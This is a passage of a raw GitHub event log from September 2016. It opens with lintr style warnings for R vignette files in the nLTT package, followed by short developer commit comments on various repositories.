4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:80:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L80) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:3:9:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L3) *style:* **Variable and function names should be all lowercase.**\n```r\n​library(nLTT)\n        ^~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L10) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:21:27:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L25) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:28:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L28) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:27:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:31:37:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L37) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:39:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L39) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:42:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L42) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:27:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:55:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L55) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:57:27:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:58:37:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:61:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L61) *style:* **lines should not be more than 80 characters.**\n```r\n​newick <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:1:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:66:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L66) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:69:2:](https://github.com/richelbilderbeek/nLTT/blob/72fec5bbf9851195b423f564d1e7a662f0ea1f60/inst/doc/vignette_stretch_nltt_matrix.R#L69) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2016-09-14T07:15:19Z"}
{"id":"4560251098","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19013718,"position":14,"line":40,"path":"language/src/ceylon/language/StringBuilder.ceylon","commit_id":"c3ac9afe0c2d02b1967ffe7234b343994fa9a544","created_at":"2016-09-14T07:16:02Z","updated_at":"2016-09-14T07:16:02Z","body":"No, @ncorai is correct, there *is* a `version-1.3.0` branch (not the `version-1-3-0` branch which has since been deleted).\r\nAnd really, new features should not be committed *in the middle of a release* (!) without the person doing so being willing to run *all* tests themselves to prove this didn't break anything."}},"created_at":"2016-09-14T07:16:02Z"}
{"id":"4560253397","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013722,"position":459,"line":459,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:16:38Z","updated_at":"2016-09-14T07:16:38Z","body":"没有return任何值，check的结果每次都是不成立的吧"}},"created_at":"2016-09-14T07:16:38Z"}
{"id":"4560253606","type":"CommitCommentEvent","actor":{"login":"sberlinches"},"repo":{"name":"sequelize/sequelize"},"payload":{"comment":{"id":19013723,"position":null,"line":null,"path":null,"commit_id":"9f0b5d1af24f6741aadebba411a21dc1d774d2c1","created_at":"2016-09-14T07:16:41Z","updated_at":"2016-09-14T07:16:41Z","body":"Prepared statements, sold it!\r\nI took for granted that it was using it.\r\nThanks for the quick answers ;)"}},"created_at":"2016-09-14T07:16:41Z"}
{"id":"4560257182","type":"CommitCommentEvent","actor":{"login":"nbasili"},"repo":{"name":"transifex/transifex-sync-zendesk"},"payload":{"comment":{"id":19013728,"position":8,"line":16,"path":"src/lib/transifex-api/project.js","commit_id":"93a36d4771f131dadcf982ead7847b5e6ba9ab68","created_at":"2016-09-14T07:17:41Z","updated_at":"2016-09-14T07:17:41Z","body":"@SofiaMargariti Are you sure? The framework version is defined in manifest.json, which btw is \"1.0\", so given that the version was 1.2.3 and not 1.0 (as defined in the manifest), I thought it was referring to the plugin version, like the one definded in package.json, no?\r\n\r\nAlso this header is for our own use and I think it should be aligned with the plugin version, so that on our API endpoints can track the version of the plugin used, no?"}},"created_at":"2016-09-14T07:17:41Z"}
{"id":"4560258048","type":"CommitCommentEvent","actor":{"login":"ximex"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":19013731,"position":87,"line":113,"path":"adm_program/system/classes/tableroles.php","commit_id":"0fae7771155b2d0c70f2b00461fbf22ada14903b","created_at":"2016-09-14T07:17:55Z","updated_at":"2016-09-14T07:17:55Z","body":"@Fasse fixed: 16b5042d6b7b909103bb9227b9f61c5432ed65ec"}},"created_at":"2016-09-14T07:17:55Z"}
{"id":"4560261798","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013738,"position":525,"line":525,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:18:57Z","updated_at":"2016-09-14T07:18:57Z","body":"bindevent为啥需要把Covering返回，要链式调用吗？"}},"created_at":"2016-09-14T07:18:57Z"}
{"id":"4560274259","type":"CommitCommentEvent","actor":{"login":"peterhgao"},"repo":{"name":"datasciencefreak/sfdat26_work"},"payload":{"comment":{"id":19013762,"position":null,"line":null,"path":null,"commit_id":"d6b07289a5f8afd4168a6805467885bc4e0c3d9f","created_at":"2016-09-14T07:22:13Z","updated_at":"2016-09-14T07:22:13Z","body":"**HW 1 Feedback**\r\n\r\n**More tasty**\r\n- Nice job with meticulous EDA, sanity checking, and comments for readability. \r\n- #2 - This is both creative and accurate way of approaching this question. Haven't seen this approach before.\r\n- #4 - Don't forget to label your chart.\r\n\r\n**A Little More Morbid**\r\n- #11 - Good job visualizing with a for statement. Alternatively, as we did in class, you can try: killings.age.hist(by=killings.race, figsize = (12,8), sharex = True, sharey = True)\r\n\r\n**Less Morbid**\r\n- #8 - Similarly for this: majors['Median'].hist(by=majors['Major_category'], sharex = True, sharey = True, figsize=(15,10))\r\n- #10 - We were also looking for unemployment rates on this.\r\n\r\nNice work Vivek, or shall I say datasciencefreak! I learned some things from your approaches to these questions."}},"created_at":"2016-09-14T07:22:13Z"}
{"id":"4560274683","type":"CommitCommentEvent","actor":{"login":"hotoo"},"repo":{"name":"hotoo/dotfiles"},"payload":{"comment":{"id":19013763,"position":null,"line":null,"path":null,"commit_id":"ae1155d15c5640da80d285381038e0a632c7c711","created_at":"2016-09-14T07:22:19Z","updated_at":"2016-09-14T07:22:19Z","body":"https://github.com/hotoo/gitplus/wiki#useful-gitplusrc"}},"created_at":"2016-09-14T07:22:19Z"}
{"id":"4560274757","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013764,"position":566,"line":566,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:22:19Z","updated_at":"2016-09-14T07:22:19Z","body":"没注释呀 亲 你这么深的逻辑结构和这么深的回调嵌套，怎么一句注释都木有呢？"}},"created_at":"2016-09-14T07:22:19Z"}
{"id":"4560280413","type":"CommitCommentEvent","actor":{"login":"sarah-verys"},"repo":{"name":"Booleans/CodeEval-Challenges"},"payload":{"comment":{"id":19013768,"position":null,"line":null,"path":null,"commit_id":"4f3aa782a8491bdd8f263a6fbeed8437ec4a1520","created_at":"2016-09-14T07:23:45Z","updated_at":"2016-09-14T07:23:45Z","body":"of course I didn't make these files in my repo >< hehe\r\nI pushed my first pass at the Prime Palindrome problem _finally_. I have to admit, I ended up doing a bit of research for the integer reversal *but* I guess that's the point of this anyway? :) Let me know what you think!"}},"created_at":"2016-09-14T07:23:45Z"}
{"id":"4560281575","type":"CommitCommentEvent","actor":{"login":"voracek"},"repo":{"name":"voracek/hello_world_JV2"},"payload":{"comment":{"id":19013770,"position":null,"line":null,"path":null,"commit_id":"21154bb56b8aa9bde6785e9c592e72e2dbcd24ad","created_at":"2016-09-14T07:24:05Z","updated_at":"2016-09-14T07:24:05Z","body":"OK"}},"created_at":"2016-09-14T07:24:05Z"}
{"id":"4560284277","type":"CommitCommentEvent","actor":{"login":"zzc77824"},"repo":{"name":"zzc77824/ci"},"payload":{"comment":{"id":19013776,"position":null,"line":null,"path":null,"commit_id":"902886a9fe9c2216a7b6c020575ec13ab520c67f","created_at":"2016-09-14T07:24:47Z","updated_at":"2016-09-14T07:24:47Z","body":"这是啥？"}},"created_at":"2016-09-14T07:24:47Z"}
{"id":"4560284978","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":19013777,"position":null,"line":null,"path":null,"commit_id":"7f73203572b1835588bfe3f705b3e898a107dc42","created_at":"2016-09-14T07:24:58Z","updated_at":"2016-09-14T07:24:58Z","body":"I tested this on 10.11.6. The documentation says it is called either when animation completes or when the animation is removed, in our case we do not remove it until completion, hence I think the behavior I was seeing is “correct”."}},"created_at":"2016-09-14T07:24:58Z"}
{"id":"4560285186","type":"CommitCommentEvent","actor":{"login":"sarah-verys"},"repo":{"name":"sarah-verys/codeeval"},"payload":{"comment":{"id":19013779,"position":null,"line":null,"path":null,"commit_id":"af8a20d4b081163d4884e7fa75fd4bf6face95ef","created_at":"2016-09-14T07:25:02Z","updated_at":"2016-09-14T07:25:02Z","body":"Challenge: https://www.codeeval.com/open_challenges/3/"}},"created_at":"2016-09-14T07:25:02Z"}
{"id":"4560291361","type":"CommitCommentEvent","actor":{"login":"ko889910"},"repo":{"name":"ko889910/jllw"},"payload":{"comment":{"id":19013787,"position":null,"line":null,"path":null,"commit_id":"f9e4349a797ce8b34ff6e666f1d4fd6c722b5f7f","created_at":"2016-09-14T07:26:39Z","updated_at":"2016-09-14T07:26:39Z","body":"fuck u ,sb"}},"created_at":"2016-09-14T07:26:39Z"}
{"id":"4560295379","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013793,"position":573,"line":573,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:27:45Z","updated_at":"2016-09-14T07:27:45Z","body":"说实话，完全看不懂syncIs是啥英语语法"}},"created_at":"2016-09-14T07:27:45Z"}
{"id":"4560296244","type":"CommitCommentEvent","actor":{"login":"rajebi"},"repo":{"name":"rajebi/Python-examples"},"payload":{"comment":{"id":19013797,"position":null,"line":null,"path":null,"commit_id":"c63334eeb52b78359030548f489b495f197ce8a7","created_at":"2016-09-14T07:28:00Z","updated_at":"2016-09-14T07:28:00Z","body":"This is a branch 1 - testing"}},"created_at":"2016-09-14T07:28:00Z"}
{"id":"4560298370","type":"CommitCommentEvent","actor":{"login":"dingxu"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19013801,"position":592,"line":592,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-14T07:28:33Z","updated_at":"2016-09-14T07:28:33Z","body":"map和each各种瞎整，想起哪个用哪个"}},"created_at":"2016-09-14T07:28:33Z"}
{"id":"4560299289","type":"CommitCommentEvent","actor":{"login":"hrydgard"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":19013802,"position":14,"line":330,"path":"Common/Arm64Emitter.cpp","commit_id":"2adec71f87f44b5c52d79b1debe74edd91bf8f06","created_at":"2016-09-14T07:28:47Z","updated_at":"2016-09-14T07:28:47Z","body":"They're doing a workaround in the Linux kernel and in future chips, so future platforms should work correctly. Hopefully we won't need to worry about this again. AFAIK Samsung's Mongoose is the only ARM core that uses 128-byte cache lines."}},"created_at":"2016-09-14T07:28:47Z"}
{"id":"4560300560","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19013804,"position":null,"line":null,"path":null,"commit_id":"c9302d6cf08dc15a648f91a9ada885cffb4fdde6","created_at":"2016-09-14T07:29:09Z","updated_at":"2016-09-14T07:29:09Z","body":"Corrigé via 2c71374c35053e8ad2b3ddff64c5cf4a52fd59d9"}},"created_at":"2016-09-14T07:29:09Z"}
{"id":"4560303247","type":"CommitCommentEvent","actor":{"login":"dran7505"},"repo":{"name":"Alexpux/MSYS2-packages"},"payload":{"comment":{"id":19013810,"position":135,"line":135,"path":"openssh/openssh-7.3p1-msys2.patch","commit_id":"fc7e50e9c9af83ef6a53634b41200ab64822ff3c","created_at":"2016-09-14T07:29:50Z","updated_at":"2016-09-14T07:29:50Z","body":"Leave a line note"}},"created_at":"2016-09-14T07:29:50Z"}
{"id":"4560303736","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19013813,"position":null,"line":null,"path":null,"commit_id":"00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e","created_at":"2016-09-14T07:29:57Z","updated_at":"2016-09-14T07:29:57Z","body":"5626-Plant-HX-min-DT (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1763 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-00f7f571b5e7c2ef487c180b1b5ba4fde3dc6b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-14T07:29:57Z"}
{"id":"4560305561","type":"CommitCommentEvent","actor":{"login":"SumitKumar1985"},"repo":{"name":"shiyamalan/PowerShell"},"payload":{"comment":{"id":19013815,"position":2,"line":2,"path":"README.md","commit_id":"709726fe781372eab713cdb9e0a713fd052d1c02","created_at":"2016-09-14T07:30:28Z","updated_at":"2016-09-14T07:30:28Z","body":"Can you please paste the script for silent installer "}},"created_at":"2016-09-14T07:30:28Z"}
{"id":"4560309399","type":"CommitCommentEvent","actor":{"login":"alastair"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19013821,"position":41,"line":59,"path":"support/views.py","commit_id":"b2d01aa06cb4a1ccb6b50bc788ac19a97bee1ed7","created_at":"2016-09-14T07:31:27Z","updated_at":"2016-09-14T07:31:27Z","body":"Can we have constants for these?"}},"created_at":"2016-09-14T07:31:27Z"}
